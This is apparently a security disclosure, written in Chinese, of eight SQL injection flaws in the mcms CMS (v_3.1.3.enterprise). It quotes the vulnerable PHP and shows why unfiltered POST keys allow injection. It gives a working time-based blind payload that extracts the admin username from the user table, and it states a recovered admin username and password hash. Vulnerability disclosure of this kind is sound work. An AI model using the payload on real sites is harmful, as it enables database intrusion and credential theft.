mcms最新版SQL注入8枚打包（可出任意数据）

### 简要描述： mcms最新版SQL注入8枚打包（可出任意数据） ### 详细说明： 前段时间在wooyun提交了几个mcms的漏洞，以前mcms的版本是v_3.1.1.enterprise， WooYun: mcms最新版SQL注入三枚打包（可出任意数据） ，现在都升级到v_3.1.3.enterprise了，还是来研究一下mcms(v_3.1.3.enterprise)吧。 注入一枚：POST /app/public/model.php?m=save_data&ajax=1（注意public文件夹是安装系统时取的名字）post中有本个参数，虽然都经过了xss和sql的过滤，但是过滤的并不完全，我们看看是如何注入的。 这里一共有两个表可以注入，其中product有info_id和price两个参数可以注入，message有message_id/create_time/update_time/true_time/phone/content六个参数存在注入，一共是8个注入点。这里以phone为例进行说明。 注入产生的原因是没有对key进行过滤 ``` function m__save_data() { global $dbm,$C,$V; $_POST=H::sqlxss($_POST); $model_name=isset($_POST['model_name'])?$_POST['model_name']:''; $id=isset($_POST[$model_name.'_id'])?intval($_POST[$model_name.'_id']):0; if(!$C->model_table_exists($model_name)) die('{"code":1,"msg":"模型表不存在"}'); $model_fields=array(); foreach($_POST as $k=>$v){ if (substr($k,0,9)=='extern___') { // 填充扩展表字段 $model_fields[substr($k,9)] = $v; } } //日期特殊处理 foreach($C->model[$model_name]['fields'] as $v){ if($v['form_type']=='date') { $model_fields[$v['field_name']]=isset($model_fields[$v['field_name']])?strtotime($model_fields[$v['field_name']]):0; } } //print_r($C->model[$model_name]['fields']); //die(); //判断扩展模型表表单 $C->verify_model_form($model_name,$model_fields); ``` Post的内容经过了过滤，去看看sqlxss()是怎么实现的 ``` public static function sqlxss($input){ if(is_array($input)){ foreach($input as $k=>$v){ $input[$k]=H::sqlxss($v); } }else{ $input=H::escape($input,1); $input=htmlspecialchars($input,ENT_QUOTES); } return $input; } ``` 对用户输入的内容先用H::escape过滤，再用htmlspecialchars过滤，我们再去看看 H::escape ``` public static function escape($input, $urldecode = 0) { if(is_array($input)){ foreach($input as $k=>$v){ $input[$k]=H::escape($v,$urldecode); } }else{ $input=trim($input); if ($urldecode == 1) { $input=str_replace(array('+'),array('{addplus}'),$input); $input = urldecode($input); $input=str_replace(array('{addplus}'),array('+'),$input); } // PHP版本大于5.4.0，直接转义字符 if (strnatcasecmp(PHP_VERSION, '5.4.0') >= 0) { $input = addslashes($input); } else { // 魔法转义没开启，自动加反斜杠 if (!get_magic_quotes_gpc()) { $input = addslashes($input); } } } //防止最后一个反斜杠引起SQL错误如 'abc\' if(substr($input,-1,1)=='\\') $input=$input."'";//$input=substr($input,0,strlen($input)-1); return $input; } ``` 对用户的输入过滤的还是很彻底的，但是这里忽略了一点，那就是没有对KEY进行过滤，造成了注入。 Payload:POST提交 ``` extern___phone`)values(''/**/or(select/**/if(ord(mid((select/**/login_name/**/from/**/mcms_user/**/limit/**/0,1),1,1))%3d108,sleep(1),0))or'')#=test&model_name=message ``` 因为是time-based blind 注入，猜测管理员用户名的第一个字母时，若错误，延迟2s左右，如下图 [<img src="https://images.seebug.org/upload/201504/07001901a6979c82791347cd0033f4ab53144f2c.jpg" alt="猜测失败副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/07001901a6979c82791347cd0033f4ab53144f2c.jpg) 若正确，延迟3s左右，如下图 [<img src="https://images.seebug.org/upload/201504/07001920db515584b08daf8aee317732b7c84707.jpg" alt="猜测成功副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/07001920db515584b08daf8aee317732b7c84707.jpg) 按上面的方法依次做下去（burp intruder或者自己写个脚本跑），可测试管理员用户名为：mcmsadmin，密码为： f6fdffe48c908deb0f4c3bd36c032e72 ### 漏洞证明： 见 详细说明